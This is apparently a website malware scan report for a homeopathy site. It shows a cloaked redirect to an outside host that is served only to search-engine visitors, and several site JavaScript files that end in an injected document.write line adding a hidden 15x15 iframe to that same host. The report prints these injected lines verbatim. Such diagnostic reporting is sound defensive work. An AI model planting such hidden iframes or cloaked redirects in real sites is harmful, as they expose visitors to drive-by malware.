Malicious/Suspicious Redirects
Request | Server response | Status |
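URL: http://catherinehollandhomeopathy.com/ (request imitating a visitor arriving from a search engine) GET / HTTP/1.1 Host: catherinehollandhomeopathy.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 17:29:23 GMT Location: http://Material.intelextraction.org/xcntrzkim.cgi?7 Server: Apache Content-Length: 259 Content-Type: text/html; charset=iso-8859-1 | malicious |
Note: the same URL fetched in the page scan below returned 200 OK, so this redirect appears to be served only to requests carrying a search-engine Referer. When cleaning the site, check the server-side redirect rules (for example the Apache configuration or .htaccess) as well as the injected scripts.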
Scanned pages/files
Request | Server response | Status |
http://catherinehollandhomeopathy.com/ | 200 OK Content-Length: 11528 Content-Type: text/html | clean |
http://catherinehollandhomeopathy.com/media/system/js/caption.js | 200 OK Content-Length: 2130 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The injected part is the final document.write(...) statement, which adds a 15x15 iframe loading the same host as the redirect above; the code before it appears to be the file's ordinary caption script, abridged in this excerpt. The same statement ends every other excerpt marked malicious in this table, so each of those files needs the appended line removed or the file restored from a known-good copy.
var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); ;document.write('<iframe src="http://Material.intelextraction.org/xcntrzkim.cgi?7" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>'); Antivirus reports:
| ||
http://www.google.com/jsapi | 200 OK Content-Length: 24552 Content-Type: text/javascript | clean |
http://catherinehollandhomeopathy.com/plugins/content/sigplus/js/safemode.initialize.min.js | 200 OK Content-Length: 907 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function __jQuery_version_compare__(){return function(e,f){for(var g=e.split("."),b=f.split("."),a=0;a<b.length;a++){var c=parseInt(g[a]),d=parseInt(b[a]);if(c!=d)return c>d}return true}(jQuery().jquery,"1.4.2")}if(typeof __jQuery__=="undefined"){if(typeof jQuery!="undefined"&&!__jQuery_version_compare__())var __jQueryOther__=jQuery;if(typeof jQuery=="undefined"||!__jQuery_version_compare__())google.load("jquery","1.4.2");else var __jQuery__=jQuery}; ;document.write('<iframe src="http://Material.intelextraction.org/xcntrzkim.cgi?7" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>'); Antivirus reports:
| ||
http://catherinehollandhomeopathy.com/plugins/content/sigplus/js/safemode.finalize.min.js | 200 OK Content-Length: 586 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof __jQuery__=="undefined"){var __jQuery__=jQuery.noConflict();if(typeof __jQueryOther__!="undefined")jQuery=__jQueryOther__}; ;document.write('<iframe src="http://Material.intelextraction.org/xcntrzkim.cgi?7" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>'); Antivirus reports:
| ||
http://catherinehollandhomeopathy.com/plugins/content/sigplus/engines/boxplus/slider/js/boxplus.transition.min.js | 200 OK Content-Length: 3953 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof __jQuery__=="undefined")var __jQuery__=jQuery; (function(b){function F(a,p){var g=parseInt(a.css(p));return isNaN(g)?a[p]():g}var x="boxplus-disabled",z=Math.max,G=Math.floor,A=Math.ceil;b.fn.maxWidth=function(){var a=0;this.each(function(p,g){a=z(a,b(g).safeWidth())});return a};b.fn.maxHeight=function(){var a=0;this.each(function(p,g){a=z(a,b(g).safeHeight())});return a};b.fn.safeWidth=function(){return F(this,"width")};b.fn.safeHeight=function(){return F(this,"height")};b.fn.boxp ;document.write('<iframe src="http://Material.intelextraction.org/xcntrzkim.cgi?7" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>'); Antivirus reports:
| ||
http://catherinehollandhomeopathy.com/plugins/content/sigplus/engines/boxplus/lang/boxplus.lang.min.js | 200 OK Content-Length: 2882 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof __jQuery__=="undefined")var __jQuery__=jQuery; (function(a){var e="",f={en:{language:"English",first:"First",prev:"Previous",next:"Next",last:"Last",close:"Close",enlarge:"Enlarge",shrink:"Shrink",download:"Download",metadata:"Image metadata"},de:{language:"Deutsch",first:"Erstes",prev:"Zurück",next:"Weiter",last:"Letztes",close:"Schließen",enlarge:"Vergrößern",shrink:"Verkleinern",download:"Download",metadata:"Bild Metadaten"},es:{language:"Español",first:"Primera",prev:"Ante a(function(){var b=/lang=([a-z]{2,})(?:-([A-Z]{2,}))?/;a('script[src*="boxplus"][src*=lang]').each(function(){var c=b.exec(a(this).attr("src"));c&&a.boxplusLanguage(c[1],c[2])})})})(__jQuery__); ;document.write('<iframe src="http://Material.intelextraction.org/xcntrzkim.cgi?7" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>'); Antivirus reports:
| ||
http://catherinehollandhomeopathy.com/templates/layout110/jquery.js | 200 OK Content-Length: 91837 Content-Type: application/javascript | clean |
http://catherinehollandhomeopathy.com/templates/layout110/script.js | 200 OK Content-Length: 11966 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { var m = document.uniqueID && document.compatMode && !window.XMLHttpRequest && document.execCommand; try { if (!!m) { m('BackgroundImageCache', false, true); } } catch (oh) { }; var data = [ {str:navigator.userAgent,sub:'Chrome',ver:'Chrome',name:'chrome'}, {str:navigator.vendor,sub:'Apple',ver:'Version',name:'safari'}, {prop:window.opera,ver:'Opera',name:'op }); } jQuery(function() { artButtonSetup("art-button"); }); jQuery(function() { artButtonSetup("button"); artButtonSetup("readon"); artButtonSetup("readmore"); });document.write('<iframe src="http://Material.intelextraction.org/xcntrzkim.cgi?7" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>'); Antivirus reports:
| ||
http://catherinehollandhomeopathy.com/index.php?option=com_content&view=article&id=1&Itemid=2 | 200 OK Content-Length: 10049 Content-Type: text/html | clean |
http://catherinehollandhomeopathy.com/index.php?option=com_content&view=article&id=10&Itemid=12 | 200 OK Content-Length: 10260 Content-Type: text/html | clean |
http://catherinehollandhomeopathy.com/index.php?option=com_content&view=article&id=2&Itemid=3 | 200 OK Content-Length: 13520 Content-Type: text/html | clean |
http://catherinehollandhomeopathy.com/index.php?option=com_content&view=article&id=3&Itemid=4 | 200 OK Content-Length: 10194 Content-Type: text/html | clean |
http://catherinehollandhomeopathy.com/index.php?option=com_content&view=article&id=9&Itemid=11 | 200 OK Content-Length: 10057 Content-Type: text/html | clean |
http://catherinehollandhomeopathy.com/index.php?option=com_content&view=article&id=11&Itemid=13 | 200 OK Content-Length: 4734 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=catherinehollandhomeopathy.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://catherinehollandhomeopathy.com/
Result: catherinehollandhomeopathy.com is not infected or malware details are not published yet.
Result: catherinehollandhomeopathy.com is not infected or malware details are not published yet.